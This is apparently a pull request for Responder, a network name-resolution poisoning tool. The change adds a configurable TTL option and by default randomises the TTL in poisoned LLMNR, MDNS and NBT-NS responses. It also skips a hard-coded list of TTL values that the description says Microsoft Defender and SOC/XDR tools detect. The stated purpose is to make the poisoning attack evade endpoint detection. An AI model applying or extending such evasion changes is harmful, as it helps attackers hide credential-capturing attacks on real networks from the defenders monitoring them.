### PR TITLE
Random TTL value added to avoid some EDR detections

### DIFF
--- a/Responder.py
+++ b/Responder.py
@@ -45,6 +45,7 @@ parser.add_option('-Q','--quiet',           action="store_true", help="Tell Resp
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
+parser.add_option('-t','--ttl',      action="store",      help="Configure the TTL in the victim cache. Value in hex (30 seconds = 1e)", dest="TTL", metavar="1e", default=None)
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:

--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -76,7 +76,7 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 							})
 
 				elif LLMNRType == True:  # Poisoning Mode
-					Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+					Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 					if not settings.Config.Quiet_Mode:
@@ -90,7 +90,7 @@ class LLMNR(BaseRequestHandler):  # LLMNR Server class
 							})
 
 				elif LLMNRType == 'IPv6' and Have_IPv6:
-					Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+					Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
 					Buffer1.calculate()
 					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 					if not settings.Config.Quiet_Mode:

--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -73,7 +73,7 @@ class MDNS(BaseRequestHandler):
 						})
 			elif MDNSType == True:  # Poisoning Mode
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
 				Buffer.calculate()
 				soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
 				if not settings.Config.Quiet_Mode:

--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@@ -44,7 +44,7 @@ class NBTNS(BaseRequestHandler):
 							'AnalyzeMode': '1',
 							})
 				else:  # Poisoning Mode
-					Buffer1 = NBT_Ans()
+					Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
 					Buffer1.calculate(data)
 					socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 					if not settings.Config.Quiet_Mode:

--- a/settings.py
+++ b/settings.py
@@ -168,6 +168,18 @@ class Settings:
 		self.ExternalIP6        = options.ExternalIP6
 		self.Quiet_Mode			= options.Quiet
 
+		# TTL blacklist. Known to be detected by SOC / XDR
+		TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
+		# Random TTL
+		if options.TTL is None:
+			TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
+			if TTL in TTL_blacklist:
+				TTL = int.from_bytes(TTL, "big")+1
+				TTL = int.to_bytes(TTL, 4)
+			self.TTL = TTL.decode('utf-8')
+		else:
+			self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
+
 		#Do we have IPv6 for real?
 		self.IPv6 = utils.Probe_IPv6_socket()
 			

--- a/utils.py
+++ b/utils.py
@@ -559,6 +559,7 @@ def StartupMessage():
 		print('    %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
 	if len(settings.Config.DontRespondToName):
 		print('    %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
+	print('    %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
 	print('')
 
 	print(color("[+] ", 2, 1) + "Current Session Variables:")


### PR DESCRIPTION
MDE seems to detect the TTL value when responder sends the poisoned request. Without playing the cat and mouse, this PR allows the TTL value to be controlled from the configuration file and by default the value will be random within a defined range.